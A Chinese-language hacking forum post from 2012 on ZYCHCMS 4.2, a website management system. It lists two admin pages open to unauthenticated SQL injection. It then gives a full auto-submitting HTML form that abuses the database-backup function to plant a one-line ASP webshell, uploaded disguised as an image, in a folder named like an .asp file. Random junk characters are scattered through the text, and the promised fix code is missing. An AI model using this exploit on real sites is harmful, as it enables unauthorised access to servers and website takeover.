z& z5 o) t/ }& h. l$ v( t
9 q6 T# a$ @. Q& U9 r5 Y0 L: Y, L! A, `9 s/ a8 X: K% H
9 f; c1 n1 z/ F$ z# B6 K影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
/ B* n; _+ w' s3 x9 m; H& C ①SQL注射漏洞$ ^* t8 g$ _! [# u& s. y) A, ^/ ]
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
% w2 W% l0 B3 |& D 漏洞原因:未过滤/ T: G3 `6 ?: {" M1 h% ~, I
漏洞代码:
; H/ j8 j3 X3 H8 [' t8 ~& v$ x 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
Z/ d6 Y/ r& S( t1 R" o 修复方法:在文件开头加入代码
) @) M( J8 L1 @ % o% O/ c% l8 E3 f- Y: ^
1 m: L1 e2 E( j( v; r
②后台拿WBSHELL1 A4 v4 M' V0 x( P, }# @0 h) z
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。 c' z5 D( Q) T! ^+ [( s! t
这里在网上找了一个,改了下,将就着用。 u! m# T6 h) ^0 g: E
以下是代码本地提交代码$ h6 b; ?; G. D3 k4 r3 a" ]
- O. z& u( g& F
9 U' |/ C# r3 C2 D<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
1 i, L0 B# Z7 m <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>2 A" I# f. h; L. D
<tr>
# E7 I K! H1 @3 G6 r <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>/ h6 a; F( j! }0 C
</tr>2 T3 }8 E: q2 T' e
<tr>
" `7 t6 m3 }4 C% K) \2 R+ B5 ` <td bgcolor=”#FFFFFF”><span class=”back_southidc”>' j5 g: D0 e& W Q
</span>0 U! `8 M% k% T, b. h
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
% V( ~" r2 f7 t <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >" e& h3 O; E$ [( ]) |
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
: _3 @$ s V) `" u H <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d8 y# y; { `/ O5 y- ]& ~) P
<div align=”left”>
* p' V4 V. a7 I <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
% g: T1 h& T; M. m7 O3 v5 |" R <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
) y# t& D' Q( f" U <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />" K h' V# j+ m; M& E( ?$ F
</div></td>6 p( B0 [. G2 y$ w: ]
</tr>
. \3 k) j0 ~- C+ o <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>. ^2 S2 f% R7 [: w& L% ?
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>. |* `1 G. M& f4 r* X) T8 u& X
<td class=”td”><div align=”left”>9 ]7 l3 Q# O( u' O9 ]. k) S: @
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />! w$ S3 B" R, P
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td># m+ p* F7 H$ |4 t
</tr>% \) `# V6 Z$ N1 Y' ?
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″> M) N: J' P1 D1 T9 R' n
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>, O" L$ m! m+ S$ D) E3 a: d5 w
<td class=”td”><div align=”left”>
2 n4 [( w) h$ f6 k6 l <input type=”submit” value=”确定备份” class=”btn”' A1 V! ?$ J% Y# _2 L) V& `6 x
</div></td>4 L/ e" b8 d- g4 P- p0 i- m# Z q7 m
</tr>" P9 o0 C+ j$ S
</table></td></tr></form>
5 ^: d3 Y2 q T/ h </table>
J+ ?- b: w3 A3 U </td>
1 q4 T _/ A/ R' }) k8 p </tr>
' n1 ?; m# c( L' H/ ?9 M( z; k' A </table>: }8 i( z5 J7 F/ ^, J. ?% s) w
<script>
+ `8 H0 t" M% T4 U7 V A3 L0 n document.all.add.submit();6 P8 l' m) P# s4 i; J& A% r* Q2 \( M
</script>
. a4 Z$ x1 a' R0 F
+ Z( i' I8 U% u( R _
4 P: w: I, `3 T) K) g$ ?: |% B. ]. m7 w; j( a
# e" M! O% [- L8 A) y+ E9 F; A& ?
2 _' ~1 i! x# m/ S
9 W( f4 [6 f. O7 c, P% K
5 W6 k" j' N6 ]- C& p3 V+ Y. @6 U3 R% c8 i* ?
# H2 _* ?/ p# V: @. V- n% K) P5 a- |/ O% _$ b' b- c
|
发表于 2012-9-10 21:09:51
收藏
支持
反对